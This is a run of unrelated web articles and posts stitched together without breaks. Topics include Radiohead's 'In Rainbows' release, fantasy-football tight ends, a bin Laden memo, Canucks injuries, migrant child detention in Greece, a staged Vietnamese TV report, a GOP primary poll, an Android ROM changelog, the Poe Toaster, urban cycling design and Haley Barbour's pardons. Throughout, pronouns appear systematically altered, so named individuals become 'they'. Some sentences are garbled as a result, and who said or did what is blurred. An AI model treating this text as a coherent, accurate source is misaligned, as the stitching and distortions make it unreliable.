Radiohead has not abandoned the physical disc. A mail-order deluxe version of “In Rainbows” — the album and a bonus CD, two vinyl albums, artwork and a fancy package for $80 — went on sale alongside the downloaded version on Oct. 10, directly from the band's own mail-order merchandising company, W.A.S.T.E., and was shipped to the first buyers last week.
Mr. Hufford said that they and Bryce Edge, Radiohead's other manager, had come up with the pay-what-you-want plan during a stoned philosophical conversation about the value of music. They had initially proposed releasing only the download and the deluxe box, but the band overruled them, noting that many of its fans are neither downloaders nor elite collectors. On Jan. 1 — a day when few albums are usually released — the single-disc “In Rainbows” is due as a retail CD and vinyl LP, in joint ventures with the independent labels TBD (part of ATO Records, partly owned by Dave Matthews) in the United States and XL in most other countries.
Will Botwin, the president and chief executive of ATO Records Group, optimistically described the download as “the world's largest listening party,” drawing attention to the album among Radiohead's core fans. The label plans to market to a broader audience with everything from television advertisements to in-store displays. Radio stations have already been sent the bruising rocker “Bodysnatchers” — a song, Mr. Yorke said, inspired by Victorian ghost stories, “The Stepford Wives” and their own feeling of “your physical consciousness trapped without being able to connect fully with anything else” — and the tense folk-rocker “Jigsaw Falling Into Place.”
The music business awaits results on how the worldwide downloads of “In Rainbows” will affect disc sales. “The record company doesn't know,” said a grinning Colin Greenwood, Radiohead's bassist, over tea in London. “They called our office and said, ‘We've made this amount of records, is it enough?' And our manager's office said, ‘I don't know.' It's great, isn't it?” For Radiohead, uncertainty is home turf.
Updated August 20, 2014
While most fantasy pundits agree on strategy for quarterbacks (Wait!), running backs (Load up early!) and wide receivers (Get a stud or two!), the tight end position is another animal entirely. There are those who believe that it's an easily replaceable “onesie” position -- i.e. owners only have to start one per team, so there are a number of decent options available on the waiver wire -- and therefore it's not worth burning an early round pick on an elite tight end. Then there are those (like me) who believe that drafting an elite tight end is a good foundation for a championship roster.
Last year, I laid out The Case for J. Graham, and since then not much has changed. Using the “last starter” VBD methodology, Jimmy Graham had the 5th-highest relative value (RV) in 2013 in both standard and PPR formats. RV will vary based on roster requirements, but Graham wasn't worth a 2nd round pick last reason – they were worth a 1st.
Fast forward 12 months and Rob Gronkowski is rehabbing another major surgery, so Graham is still safe atop our positional rankings. Last year's #2 TE, Vernon Davis, is angling for a new contract and may experience a drop in targets now that Michael Crabtree is fully healthy. Julius Thomas (#3 TE in 2013) is certainly worthy of an early round pick, and I'll be targeting them in the early 3rd round, but Tony Gonzalez (#4) has retired. Jordan Cameron (#5) may see more targets, but won't have the benefit of playing alongside Josh Gordon, who demanded double-teams for much of last season. So I'd argue that the elite TE tier has gotten weaker, and that only strengthens Graham's status as a bona fide 1st round pick.
But what if we miss out on Graham? As I mentioned, Thomas in the late 2nd/early 3rd is an option. Late 2nd is a stretch, but if I'm near the turn and know I can get a good RB or WR on the way back, I might pull the trigger on the Bronco TE knowing that he's likely to see some more work with Eric Decker now residing in New York. Thomas is also still learning the game and should improve with more experience.
If I don't get Thomas, then I'm likely to wait a while before drafting a tight end, hoping for value to emerge in the form of one of the players below, because it very likely will.
Values
I do think Jason Witten (7.02) and Jordan Reed (7.04) are also solid values at their respective ADPs, but I put the cutoff at the 8th round for the purposes of this list. I'd be willing to draft either in the 7th round of standard leagues if I wasn't thrilled with my other available options.
Greg Olsen, Panthers (8.03)
Olsen finished the 2013 season as the #8 TE and finished #6 the year before. The Panthers have overhauled their receiving corps, so Olsen is easily the most trustworthy pass-catcher on the roster. Kelvin Benjamin might steal a few redzone targets, but Olsen will be heavily involved in the base offense and is likely to lead the team in receptions for the second straight season. For those that want to wait on a tight end, Olsen is a great guy to target in the 7th or 8th round.
Kyle Rudolph, Vikings (8.09)
Rudolph was the #13 TE through Week 9 prior to a season-ending fracture in their foot. They were 15th in targets per game during that span, so there's some opportunity in the workload department, especially with new OC Norv Turner in town. Turner isn't necessarily as TE-friendly as their old boss Rob Chudzinski, but they featured Antonio Gates and Jordan Cameron heavily while with the Chargers and Browns. Rudolph is just 24 and could make a nice leap if the Vikings can get good play out of the quarterback position. They should continue to be a force in the redzone and has slimmed down to take advantage of a greater workload between the 20s.
Dennis Pitta, Ravens (8.06)
Pitta missed most of 2013 due to a hip injury and was sorely missed in the Ravens' passing game. Upon their return, they saw 33 targets in four games, putting them on pace to finish with the 3rd-most targets in the league. It's not a solid sample size, but it's still an indicator of what may come. (He finished with the 12th-most targets in 2012.) The big plus for Pitta heading into 2014 is the arrival of new OC Gary Kubiak who has been very TE-friendly throughout their career, specifically with the development of both Shannon Sharpe in Denver and Owen Daniels in Houston. The Ravens also signed Daniels, but they should be relegated to mainly two-TE sets in 2014.
Martellus Bennett, Bears (12.02)
Bennett was targeted more heavily by Jay Cutler than they were by Josh McCown, which bodes well for 2014, assuming Cutler can stay healthy. Removing Week 7 and Week 10 (where both QBs played extensively), Bennett averaged 4.8-58-.33 (on 6.6 targets) with Cutler and 3.4-41-.20 (on 5.2 targets) with McCown. Those numbers with Cutler are top 10 caliber, so if Bennett and their QB stay healthy, Bennett is likely to outperform their draft position.
Charles Clay, Dolphins (12.03)
Clay was the #7 TE in 2013, so he's not going to sneak up on anybody. New OC Bill Lazor comes from Chip Kelly's staff in Philadelphia, and Kelly wasn't afraid to use the tight end position last season. Zach Ertz and Brent Celek combined to catch almost 22% of Philadelphia's receptions in 2013, while Clay was responsible for 19.3% of Miami's receptions. He's also a threat to get a goal line carry or two.
Osama bin Laden issued a handy guide about masturbation – assuring jihadists that they approved of self-love in extreme cases.
The memo — among the documents and sizable porn stash seized in 2011, when Navy SEALs killed them in Pakistan — have now been released by the Office of the Director of National Intelligence.
The documents expose the 9/11 mastermind as a hands-on leader, eager to dispense any and all advice to their sex-starved fighters.
“Another very special and top secret matters (eyes only you, my brother Abu Muhammad Salah and Samir): it pertains to the problem of the brothers who are with you in their unfortunate celibacy and lack of availability of wives for them in the conditions that have been imposed on them,” they wrote.
“We pray to God to release them. … God is not ashamed of the truth,” they continued. “As we see it, we have no objection to clarifying to the brothers that they may, in such conditions, masturbate, since this is an extreme case. The ancestors approved this for the community.”
Before issuing the call to arms to their minions suffering through dry spells, Al Qaeda's former top dog acknowledged that some jihadis might be “ashamed” by servicing themselves, News.com.au reported.
“We wanted to reflect some more and research it, and we want to get back to you on it before you say anything about it. Give us your opinion — is it appropriate? “Can it be suggested to the brothers? If so, how?” they wrote.
“Do you think it can help solve the problem? Or do you think we should avoid proposing it, and rather stick to the recommendation of total patience and seek help through fasting?” they added.
In 2015, US officials refused to release details on the “extensive” smut collection – including sex videos — found in bin Laden's Abbottad lair.
According to a report stemming from today's practice Henrik Sedin is expected to make their return to the Canucks lineup on Saturday night, when the team plays host to the Los Angeles Kings. As you'll recall they were injured nearly two weeks ago now, when they took an awkward hit to the leg on a play behind the net (which is ironic, since those three words generally elicit such positive thoughts).
The return falls right in-line with the initial prognosis of 2 weeks, but still, there's ample reason to question why exactly the team would want to bring them back in the first place given the circumstances.
Read on for more.
The Canucks currently have a 0.03% chance of making the playoffs, and as I outlined earlier this week, they'd be well served to lose as many of the final 5 games as possible. It would behoove them even more to make sure that they're not putting unquestionably their most valuable player in harm's way for no reason, particularly given the laundry list of bumps and bruises they have piled up in an especially tough campaign for the team's Captain.
The key words there are “harm's way”, what with the team the Canucks will be facing when they make their return. These two squads have had a couple of really outwardly physical games this year, and Henrik Sedin has been at the center of it all. They haven't necessarily been the guy throwing the punches, but both the November 25th and January 13th meetings – which featured a combined 189 penalty minutes – all started with dirty runs by one Jordan Nolan on Henrik himself.
Those aren't the only times that Nolan, who I generally perceive as a fairly scummy player that isn't nearly good enough to get away with the things they try to do, has gone after him. It seems like every time these teams play Top Sixtito is dropping the gloves with them as a result, and if I were a betting man, I'd probably wager we see them add another chapter to that rivalry on Saturday night.
With all of that being said, I guess I can see the rationale for bringing Henrik back into the mix if they have in fact said that he's good to go. Given all of the off-ice drama involving the Coach and GM, it makes sense that the team would try to divert the attention back onto the on-ice product.
Henrik Sedin has made a career of making everyone they play with better. We know that. But one guy in particular that will be undoubtedly thrilled to see them will be Nicklas Jensen, who has fallen on some hard times recently. This rough patch has by no means come of left field. Which is why I was pretty surprised to see commenters take offense with my insinuations that Jensen would struggle without Henrik there to spoonfeed them in the comments section below the article announcing #33 would miss 2 weeks.
“Soooo…you really are trying to contribute the success of Jensen to the play of Henrik and Burr? Two players who coincidentally struggled right until the moment that Jensen joined that line?” is what one person said, which I responded to with “yes, I am saying that.“
This isn't meant to blast that person, because they certainly aren't alone. The Jensen Train was running rougshod through Vancouver at that time. The point I'm trying to make is that Nicklas Jensen has 6 shots, no goals, and 1 assist in the 4 games Henrik has missed. Some of that has to do with their brief stint down the lineup, some of that has to do with the inevitable slowing down they were due for. But a lot of it was due to the fact that they didn't have one of the world's best playmakers around to serve as a safety blanket of sorts.
Let us never forget just how amazingly successful Henrik Sedin is at doing what they do for a living.
Fashion shortlisted is an online store for the shopping of scarves. Scarf is primarily an accessory that is used to add glamour to the normal look. Fashion shortlisted recently announced it the latest season collection that comprises of scarf's having embroidery similar to that sweaters. The main reason because of which fashion shortlisted is preferred for buying scarves online is because of their desire to provide the designer scarves to its customers that too at an affordable range.
Fashion shortlisted doesn't only provide its customers with embroidery scarves but we have a variety of scarves whether it is digitally printed scarves, infinity scarves or red silk scarves. All the designer pieces are also available in the color of your choice.
We provide Best scarves for winter fashion round the globe. Other than keeping fashion in mind we do give a fair amount of importance to the quality. Our sweater embroidery scarves are one of our top selling products in European countries as we make sure that the scarves provide are warm enough for the cold evening.
Greece is imprisoning unaccompanied migrant children in violation of EU laws and often in appalling conditions, human rights campaigners have revealed.
In a report detailing how asylum seekers and irregular migrants are being detained "as a matter of course, rather than a last resort," Amnesty International has excoriated Athens for its policy of imprisoning children for long periods.
Conditions are so appalling, the report says, that children resort to hunger strikes in protest at their imprisonment, and some even attempt suicide.
"It is never acceptable that children are detained. Children should not be subjected to poor conditions and long periods of confinement," said Nicolas Beger, head of the group's Brussels office.
"Although Greece is experiencing economic hardship and is receiving a large number of migrants, these issues cannot serve as an excuse for treating children in such a way."
The group documents how conditions in a "vast number" of the country's immigrant detention centres are poor, with overcrowding and sanitation a problem.
Unaccompanied children who are captured by authorities when arriving in Greece are usually detained following their arrest for irregular entry. Where a deportation order is issued, detention continues until a legal guardian is appointed and a place found in a special reception centre for unaccompanied children.
Overcrowding is problem particularly in the summer when a large number of migrants attempt to make the perilous journey across the Mediterranean to what they believe to be the promised land of the European Union.
At the Pagani immigration detention centre in the summer of 2009, some 150 children went on hunger strike to protest the length and poor conditions of detention. More than 850 people, including 200 unaccompanied children, 150 women and 50 small children, were kept in overcrowded and insanitary conditions.
It was only after a visit from the UN High Commission for Refugees, and the ombudsman for the rights of the child, that the authorities released 570 people, mainly families with kids and unaccompanied children.
In a letter to the European Commission, the group has demanded the EU executive take action to ensure that Greece adheres to its legal obligations to migrants and refugees - and particularly their children.
Amnesty International believes that there should be a prohibition on the detention of unaccompanied children provided by law, but even in the absence of such a step forward, Greece is beholden to a number of international and EU obligations that should prevent such situations from occurring.
The UN Convention on the Rights of the Child, to which Greece is a party, states that in their best interests, ‘‘unaccompanied or separated children should not, as a general rule, be detained, and that a government provide "special protection and assistance" to children who are not in their family environment.
Furthermore, the EU's Reception Conditions Directive sets out special provisions for unaccompanied asylum-seeking minors.
"The reality for migrants in Greece is dire," said Mr Beger. "The EU must put pressure on Greece to improve the situation. Each and every person has the right to basic legal assistance and to humane treatment upon arriving in an EU country."
City dwellers often feel crime in their town has increased over the years, but upon closer examination that does not always seem to be the case, Paterson is an obvious example.
In downtown Paterson, if one is to stop and speak to a few of the locals that have lived in the city for years, one topic is almost certain to come up: crime, and how it has exploded in recent years, as if the previous years were crime free. Some will say, “Crime is out of control, and the police do nothing.” Is crime really out of control?
[ml_raw_html]
[/ml_raw_html]
The data above collected from reports issued yearly by the State Police show that violent crime has been stable throughout the decade save spikes in 2005 when aggravated assaults skyrocketed and 2006 when robbery increased just as much, and subsequently both trend continued more or less the same with dips here and there up to 2011.
2004 was the most peaceful year with the lowest number of violent incidents; 2010 was the worst year with the largest number of murders; 2010 saw the largest number of rapes and it shows little sign of improvement.
So how violent is Paterson? Not as much as residents of the city would say. Crime rates are stable as it seems from the chart with minor occasional fluctuations.
A still image from a news report featuring a group of high school students smoking hookah in Hanoi.
If it's on TV, it must be true. Maybe not.
A channel of VTC, a state-run broadcaster, has been accused of violating ethical standards after it allegedly asked a group of high school students in Hanoi to act as smokers and then vilified them in a news report.
VTC14 came under fire after the 17-year-old students told the press that the story, which was aired on March 27, has made their life miserable for falsely depicting them as heavy smokers who were totally “clueless” about what they were doing to their health.
They said they had agreed to act as smokers in the report, believing that it was meant to warn young people about the harms of hookah, better known as shisha.
The story was aired with their faces and identities clearly shown, even though the reporter promised to blur out their faces, according to the students.
Shisha – flavored tobacco products – is not banned in Vietnam. But in recent years, health and legal experts have been calling on the government to outlaw them, saying that they expose children to major health risks. Local media also often depict the common practice of shisha smoking among young people as dangerous.
The VTC14 report, less than four minutes long, features a group of students smoking. One of them claimed, apparently during an interview, that “Shisha is just for fun.”
Another said their friends convinced them to check it out during one of their gatherings. They said at first they were reluctant, but then found that “there was nothing wrong” with shisha, so they kept on smoking.
The owner of the café where the smoking took place and a mental health doctor were also interviewed in the report.
Speaking to Tuoi Tre (Youth) newspaper on Thursday, Hoang Trong Hieu, a senior producer at VTC, said the news report was a short documentary and the featured students did admit to smoking.
It was filmed with the students' consent, and prior to the filming, the reporter already warned them that it would be about a negative practice, they said.
Hieu, however, admitted that VTC producers were at fault for not protecting the identities of the students.
'Innocence'
Three of the students told Tuoi Tre that everything they did and said in the clip was scripted and reedited.
T., one of them said their best friend knew Mai Anh Thu, a VTC reporter, who was looking for a couple of students to act in a video about shisha smoking for educational purposes.
T. said they and some other students agreed to meet the reporter on March 25 at a café.
Thu, the reporter, bought shisha and smoking devices for them, saying they were props. The students said Thu asked them to smoke and answer their questions, but not all of them did as told and chose to just sit and watch.
According to Tuoi Tre, one student showed Facebook messages apparently between them and the reporter, who asked the students to wear their school uniforms and promised to edit their schools' badges out later.
T. said Thu interviewed them a lot, but when others could not give satisfying answers, the reporter asked them to take over.
“The reporter questioned me for up to 30 minutes, but in the end most of my answers were cut out and only quite sensitive ones were kept, like ‘Shisha is just for fun',” another student said.
Nguyen Thi Minh Nguyet, vice president of Tran Nhan Tong High School, told the newspaper that after the report was aired, they invited Thu to a meeting with their students, but the reporter did not respond to the accusation.
Later the school's management board sent a letter to VTC14, asking its managers to clarify if the video was really staged and whether the reporter “took advantage of the students' innocence."
However, in a written reply sent to the school early this week, the broadcaster said its reporter did their job in accordance with the rules and “respected the truth”, Nguyet said.
VTC14 further asked the school to consider not punishing the students “severely” because they are still “young and unaware of their immature act's consequences,” the vice president quoted the letter as saying.
Ethical failure
In an interview with Tuoi Tre, lawyer Hoang Cao Sang of Ho Chi Minh City's Bar Association, said VTC14 was wrong, whether the video was truly a documentary or a pseudo one.
If the video was meant to feature true people and true stories, the broadcaster was wrong when revealing the students' identities, badly affecting their dignity, they said.
VTC14 would also be violating both journalistic laws and ethics if the report was staged, the lawyer said.
They urged the students and their schools to ask relevant agencies to step in to find out the truth.
Vo Xuan Trung, another lawyer in Ho Chi Minh City, also said whatever the video was, VTC14 should have talked to the students' parents and schools, given that they are all under 18.
The students, their parents and schools can ask VTC14 to make correction and public apologies, Trung said, adding that if the broadcaster refused the demand, they can file a lawsuit.
In a public apology that was aired late Saturday, VTC14 insisted that it had abode by all professional regulations and ethical standards when shooting the documentary.
The broadcaster said it was only at fault for failing to blur the faces of the students, badly affecting their dignities and private lives.
VTC also said it suspended the crew that shot, produced and aired the documentary pending further disciplinary action.
At the end of the day, the case was yet another warning about the way the media treat children in general, and children who make mistakes, in particular, psychologist Pham Manh Ha said.
“Those people who made the video has failed, in terms of both professional ethics and humanity,” Ha said.
Wisconsin Gov. Scott Walker leads a host of potential 2016 GOP presidential contenders in a new poll in the early presidential state of New Hampshire out Wednesday.
Mr. Walker leads the NH1 automated poll, conducted Feb. 2-3, with 21.2 percent of the vote, followed by former Florida Gov. Jeb Bush at 14.4 percent, Sen. Rand Paul of Kentucky at 8.3 percent, and retired neurosurgeon Ben Carson at 8.2 percent.
Mr. Walker managed to ride a well-received performance at last month's “Iowa Freedom Summit” into a place atop a recent Bloomberg Politics/Des Moines Register poll in the Hawkeye State among like caucus-goers there.  They are scheduled to attend a GOP event in New Hampshire next month.
A NH1 “pulse poll” taken two weeks ago, prior to 2012 GOP presidential nominee Mitt Romney's announcement that they would not run for president in 2016, had Mr. Romney well ahead at 29 percent, with Mr. Bush at 11 percent and Mr. Walker at 8 percent.
In the poll out Wednesday, which was conducted by REACH Communications, New Jersey Gov. Chris Christie was next at 7 percent, followed by former Arkansas Gov. Mike Huckabee at 6.8 percent and Sen. Marco Rubio of Florida at 5.4 percent.
Next was Sen. Ted Cruz of Texas at 3.3 percent, former Texas Gov. Rick Perry at 2.7 percent, former New York Gov. George Pataki at 2.2 percent, and former Hewlett-Packard CEO Carly Fiorina at 1.7 percent.
Among the names left out of the survey were former Sen. Rick Santorum of Pennsylvania and Louisiana Gov. Bobby Jindal, who are also weighing presidential bids.
About 19 percent of the 1,012 voters were undecided or wanted someone else.
The poll included registered Republicans and undeclared voters that lean Republican and are likely to vote in the 2016 GOP primary, and has a margin of error of plus or minus 3.08 points.
Copyright © 2019 The Washington Times, LLC. Click here for reprint permission.
Code:
(29.06.2014) Stable-R2 •Kernel Update: 19.06.2014 Thanks @ktoonsez •Update ROM to Android 4.4.4 -Update SuperSU to the latest Big Thanks to @BerndHhn for testing the ROM !!!! (12.06.2014) Stable-R1 •Kernel Update: 09.06.2014 Thanks @ktoonsez •Kernel Update will fix some bugs and IRDA. •Replaced platform.xml with that from the Nexus 5 Stock ROM -ROM Link from Platform.xml: http://forum.xda-developers.com/show....php?t=2622831 (10.06.2014) Final-R3.1 •Re-edit Completly ROM •Changed some Files.. (06.06.2014) Final-R2.5 •Fixed Updater-script •Make Newer TWPR and Newer CWM Recovery fully Compatible •Recovery wipe /format System automatic (05.06.2014) Final-R2.0 •Update to 4.4.3 from a clean System Dump •Update Kernel to the Latest •Update SuperSU to the Latest •No RR, Stable, Clean and Fast !!! -All is Working !!! (02.02.2014) Final-R1.2 •Removed Aroma Installer •Set Ktoonsez kernel as default.... Voted User... •Updater-script Updated •Build.prop Updated •Update SuperSU to the Latest •Fixed Menu/Back unlock, when you on Lockscreen -Thx to the @jimbju for find the bug :) (14.01.2014) Final-R1.1 •Aroma redesign by me •Update Alucard Kernel to the Latest •ROM Name edited -Reduce The R5 to R1.1 , next will R1.2 ,R1.3 etc.... -Not needed for Final-R5 user .... -The Final-R5 user can update the kernel seperated... (12.01.2014) Final-R5 •Included Aroma Installer •Update completly Updater-script •Little Bug fixes •You can Choose your Favorite Kernel on Aroma - Alucard Kernel - Ktoonsez Kernel (08.01.2014) Final-R4 •Ktoonsez Kernel Updated •Update Updater-script •Fixed false Rotated Pictures on Gallery •Fixed Delete Pictures from ExtSD - Thanks @broodplank1337 , @danvdh , @Kryten2k35 (05.01.2014) Final-R3 •Fixed Write/Read R/W •Fixed Some /bin files •Fixed Charging LED •Delete FileManager - You can download your favorite on Play Store •Delete KTweaker - You can flash the KTweaker zip on my Mods.. •ROM are Completly Stock (04.01.2014) Final-R2 •Fixed Dual-Boot support •Fixed Toolbox in system/bin for Dual-Boot •Cleaned completly Build.prop •Added my Own Tweaks from my 4.3 -Camera Tweak -Playback Tweaks -Better Deep Sleep -Play-Store Tweaks No wipe needed when you're coming from (Final-R1) (02.01.2014) Final-R1 •Update Kernel to 3.4.75 •Some little Bug fixes •Fixed the buggy Bootanimation •Install Apk's from ExtSD are Fixed No wipe needed when you're coming from (Final) (01.01.2014) Final Happy New Year Special •New Kernel: 3.4.72--KT-SGS4-KK4.4-TWGE-INTL-12.30.2013 •Finaly Fixed Random Reboot - Credit: BEST THANKS FOR THE FIX TO @ktoonsez •Speed Charge activated - Very FAST! •BT / Bluetooth fixed (28.12.2013) RC2 •New Kernel: 3.4.0-Alucard-V2.4.3l-GE-EUR-KK4.4-SGIV-PWR-CORE+ •Fixed Random Reboot (i hope) •Updated SuperSU •Edited updater-script (26.12.2013) RC1 •Reduce Random Reboots - Full Wipe required •Delete some Touchwizz Lib's •Fixed some Things •ExFat Support •Camera FC's fixed for some user •Phone are Faster !!! (19.12.2013) v11 •libGLESv3 Application are Fixed •Return to Stock Google Edition 4.4.2 Cam •symlink fixes •FC's are Completly Fixed... (16.12.2013) v10 •Gapps FC's are Fixed •Gallery Picture Quality are Fixed •Zipalign, sqlite3, run-parts, nano, bash •New Busybox in the Rom •Little Bug Fixes... •Faster •Whatsapp works on ART (15.12.2013) v8.0 •Gapps FC's reduced ,not a FIX !! (14.12.2013) v7.0 •New ROM base 4.4.2 - KOT49H •Faux123 r2 Kernel - Dec 1 •Fixed Grey bars on Power Menu •Fixed gallery picture remove •Fixed Completly Camera and Gallery •Fixed Completly ExtSDCard (07.12.2013) v6.0-OTA •Fixed force close when assigning contact portrait •Fixed HDR •Fixed 2MP Front Camera •Fixed black Statusbar in lockscreen •Statusbar in lockscreen are transparent (06.12.2013) v5.0 •Update completly Updater-script ... •Fixed Wallpaper in Framework-res.apk •Fixed 2MP Front Camera •Build.prop cleaning and a little change valvue - Makes the Phone faster.... - Credit: @Danvdh •Performance Tuning in Build.prop - Credit: @Danvdh •Fixed some Speed issues in ART •Fixed Video Record on ART •Fixed Permission •Removed all Crap Samsung bloadware •Removed CSC Support ..its not more needed :) •Set picture and video at 100 % quality on shot, record and preview in gallery..... (01.12.2013) v4.0 •Fixed ART I have misstake on the v3.0 ,sry :/ (01.12.2013) v3.0 •ExtSD write permission are Fixed •3G/H icon are fixed •Included Busybox •Dalvik VW Changes in Build.prop •Random Reboots are fixed... @Faux123 Thx •New Kernel:jgedlte-faux123-GE-KK44-014m_r2 Thanks @Faux123 for your Kernel :) (30.11.2013) v2.0 •Settings--->Security ---> FC's is Fixed •Settings--->More...---> VPN is Fixed •Deinstall Apps are Fixed •ExtSD Fixed •Rom are Prerooted with latest SuperSU v1.80 •Added Qualcomm optimized Dalvik + Bionic - More Speed at All •New Kernel : @Ktoonsez big thanks for them :) @yener90 big thanks going to them for the Fix Solution for FC's :) The Rom are works with new and old Bootloader ... (26.11.2013) v1.0 •Initial Release
Chanoso's Restaurant, a downtown fixture for the last two decades, will close this month.
The restaurant owners said in a press release the restaurant, at 255 Ouellette Avenue, will serve its last stir fry March 26.
They said they have other plans for the building but didn't elaborate.
The media release didn't mention if the closure is related to a cockroach infestation that closed the restaurant late last year.
The health unit shut down Chanoso's in September after finding a cockroach infestation in the kitchen. An inspector found the problem after going to the restaurant for an unrelated complaint.
It re-opened in late October after the restaurant and building owners completely renovated the place, ripping out old wood and sealing every crevice.
To book a final reservation at Chanoso's, call 519-254-8530 or send an email to info@255downtown.com.
Does this mean nevermore? For the first time since 1949, a black-clad figure known as the Poe Toaster failed to show up at Edgar Allan Poe's gravesite in Baltimore to celebrate the anniversary of the writer's birth 201 years ago. The visitor, whose identity has remained a mystery, would raise a Cognac toast and leave behind three red roses, along with the remnants of the Cognac bottle. About 30 Poe fans stood in the cold for hours early on Jan. 19 as they waited for the mysterious visitor, The Baltimore Sun reported. Some speculated the toaster might have just had the flu or car trouble — or that they had died. “So many people have said: ‘I hope it's not over. It was such a nice tradition,' ” Jeff Jerome, curator of the Edgar Allan Poe House, told the newspaper. “But maybe it has just run its course. It wasn't going to last forever.”
Correction: January 31, 2010
A brief article last Sunday about the failure of a black-clad figure known as the Poe Toaster to show up at Edgar Allan Poe's grave site in Baltimore to celebrate their Jan. 19 birthday misstated the number of years since Poe was born. It was 201 years ago, in 1809  not 101 years ago.
First, I would like to thank everyone who read and/or responded to the November 13th post on creating Active Cities. The feedback was kind, supportive, and very much appreciated.
While many cities around the world are “active” in the sense of being “busy or vibrant,” many fewer can claim to be enhancing their transportation infrastructure and urban design to specifically promote active transportation on an equal par to that of cars and pedestrians. It is this missing feature of the spatial form that a vision for Active Cities is trying to fulfill.
Some initial elements of the Active City were listed in that first post, including use of alleys and other existing routes as Active Movement Corridors for cyclists, Segway-users, roller-bladers, etc.; creation of bicycle urban districts (BUDs); locating BUDs in close proximity to schools and parks; design bicycle-specific parking garages; and incorporating more staircases and ramps into building/urban design as a way of promoting walking. Below are some additional thoughts that could help bring about the transition to Active City status. They are presented in no particular order of importance.
Place bicycle and other active transportation parking in close proximity to business entrances (adjacent to barrier free parking areas) instead of relegating them to far-off locations. This would have the double-benefit of emphasizing the importance of active transportation and forcing motor vehicle drivers to “walk” the added distance from their cars and trucks. More distance = more exercise.
Orient off-street parking (except barrier-free and active transportation) to the rear or side of the facility, not in front.
Require the primary business entrance to always face the street (or alley in some cases), not the parking lot. There can be less visible secondary entrances, but the primary focus should be toward the street or alley, not toward a sea of asphalt. This will help promote more walking, while also enhancing streetscapes and street life.
Incorporate bicycle parking at all park and ride lots (see photo below from Ann Arbor), bus stops, railway stations, and other commuter lots. The concept of “bike and ride” lots has been suggested to MDOT as a way for promoting active transportation. Active commuting for even a portion of one's commute is better than none
Require buses, taxicabs, ferries, water taxis, and trains to carry bicycles and other forms of active transportation throughout the day. CATA and Green Cab here in Mid-Michigan have all of their buses and taxicabs equipped to carry at least two bikes on the front end.
Promote active transportation elements in safe routes to school programs, such as offering tandem bicycles as a “buddy-system” method for promoting active and safe travel to school. Two students could ride together, or even a parent and child could ride the tandem.
Add standards for drive-thru windows that properly and safely accommodate active transportation such as bicycles or Segways.
For winter cities of the higher latitudes and altitudes, incorporate environmentally friendly snow and ice melting (i.e. solar heating) or weather protection features into the Active Movement Corridors to permit safe year-round commuting and recreation.
Retrofit all existing parking garages and lots to incorporate spaces for active transportation elements. Priority should be given on the lowest floors as a not-so-subtle way of promoting active transportation over motor vehicles.
As is shown in the two photos below from Delphi,Indiana's heritage Trail system, tunnels and underpasses (as well as bridges) for active transportation should be incorporated whenever possible to lessen potential conflicts, particularly at dangerous locations.
In bicycle urban districts (BUDs), require building design to accommodate active transportation equipment – for example, elevators should be large enough to take a bike onto and hallways wide enough for two walked bikes to pass by one another. Other design elements should include enclosed bike storage lockers or cabinets, space set aside for bike and car sharing programs, plentiful bike racks, and changing stations/rooms.
Developments situated along streams, canals, and other water features should have safe access ramps, docking, and storage locations for canoes and kayaks. If you think this may be far-fetched, during Smart Commute 2011 in Greater Lansing, there were kayak commuters using the local rivers.
In all cases, aesthetic, artistic, lighting, landscape, and design elements should be included to compliment and coexist with the active transportation.
Pass ordinances/laws that prevent active transportation from being prohibited by landowners such as shopping centers, office parks, etc.
Adopt a bike parking ordinance which includes many of the elements listed above.
While mulling these various ideas for creating Active Cities, I am certain there are additional great thoughts and suggestions out there. Please feel free to send them along so they can be added to the discussion.
Advertisements
The big conundrum is objective vs subjective "value" - what a 30k/yr salaried person spends $100 on one day can be the same thing that the billionaire spends $100 on, but the subjective value of what the $100 paid for means much more to the less wealthy person. The problem (as I see it) with a purely resources-based system is that there's no significant motivating factor to create, innovate, or otherwise make significant strides toward making things better.
My personal philosophies would take many paragraphs that I neither feel like writing nor would anyone read. Suffice it to say it makes sense to socialize some things: military, police, government, emergency services, health care, things like that. I also don't feel like true laissez faire capitalism can flourish without exploiting people and/or resources, so I'm a fan of limited government regulation. I just don't think in the past several thousands of years of recorded history, we've come up with much else that is both effective and palatable to a society.
Jackson, Mississippi
Former Mississippi Governor Haley Barbour on Friday defended more than 200 pardons they issued during their final days in office, 41 of which they gave to convicted murderers, sex offenders and child molesters.
“Mississippians are mostly Christians,” Barbour said in a lengthy statement, which they read at a Jackson press conference on Friday. “Christianity teaches us forgiveness and second chances. I believe in second chances, and I try hard to be forgiving. The historic power of gubernatorial clemency by the Governor to pardon felons is rooted in the Christian idea of giving second chances. I'm not saying I'll be perfect, that no one who received clemency will ever do anything wrong. I'm not infallible, and no one else is. But I'm very comfortable and totally at peace with these pardons, especially of the Mansion inmates.”
Barbour went on to say that they would be perfectly comfortable allowing any of the pardoned “trusties” – prisoners who worked in the governor's mansion, some of whom were murderers – to play with their grandchildren unsupervised. “Historically the trusties sent to work at the Mansion have been murderers, convicted of crimes of passion, as experts say they are the least likely to commit another crime,” they said. Barbour, a Republican, added that 90% of their pardons were recommended by the Mississippi Parole Board and that the clemencies would save the state millions in medical bills because many of the inmates they pardoned were suffering from chronic diseases such as diabetes.
Barbour pardoned 203 convicts two days before leaving office earlier this week. In the ensuing uproar, a judge blocked the release of most of those granted clemency who were still in prison – some 21 inmates – until a review could be performed on the legality of the pardons. The vast majority of those pardoned had already completed their terms. Under Mississippi law, a public notice must run in a newspaper 30 days prior to the pardon. “Our Mississippi constitution provides strict requirements that must be met before a Governor can even issue a pardon,” Judge Jay Westfaul, president-elect of the State Association of Mississippi Municipal Judges, told TIME. “There is no doubt in my mind that Attorney General Jim Hood will prevail and that the pardons will be declared null and void.”
Less than an hour before Barbour released their statement, Hood, a Democrat, released the preliminary findings of their investigation into the pardons. Of the 181 files Hood's office has investigated, they say 140 had no public notice prior to Barbour's pardon. Of the 41 cases that did, 27 were insufficient the notices were published less than 30 days before the pardons. Only seven cases fully met the rule of law, while seven more cases were still under review. But even if Hood could void Barbour's pardons – a move that would set a new legal precedent in Mississippi – it's not clear if it's possible to reincarcerate the five inmates who've already been let out, four of them convicted murderers. Of the five, four have checked in as ordered by the Mississippi judge who stayed the release orders. But one is in Alabama and another at large. And unless the law changes, it's impossible to issue arrest warrants for men bearing papers that deem them pardoned for their crimes. “There are some tough legal issues we are trying to address,” Hood told CNN on Thursday. “This is such a unique problem that no law has ever had to address yet. We're having to make new law here.” That process could take months.
